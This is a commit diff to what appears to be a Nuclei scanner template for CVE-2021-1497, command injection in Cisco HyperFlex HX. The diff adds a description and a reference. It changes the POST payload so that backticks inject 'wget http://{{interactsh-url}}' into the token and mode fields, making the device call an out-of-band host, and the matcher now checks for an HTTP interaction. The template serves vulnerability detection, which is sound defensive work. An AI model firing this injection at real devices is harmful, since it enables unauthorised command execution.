Added HTTP check
parent
dd9e85a29c
commit
7f37050361
|
@ -2,6 +2,7 @@ id: CVE-2021-1497
|
|||
|
||||
info:
|
||||
name: Cisco HyperFlex HX Data Platform RCE
|
||||
description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
author: gy741
|
||||
severity: critical
|
||||
reference: |
|
||||
|
@ -11,6 +12,7 @@ info:
|
|||
- https://twitter.com/cycatz2/status/1394615546935529472
|
||||
- https://twitter.com/Unit42_Intel/status/1402655493735206915
|
||||
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
|
||||
tags: cve,cve2021,cisco,rce,oob
|
||||
|
||||
requests:
|
||||
|
@ -23,7 +25,7 @@ requests:
|
|||
Content-Length: 78
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=&token=`nslookup {{interactsh-url}}`&mode=`nslookup {{interactsh-url}}`
|
||||
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -32,6 +34,6 @@ requests:
|
|||
- 200
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "dns"
|
||||
- "http"
|
||||
|
|
Loading…
Reference in New Issue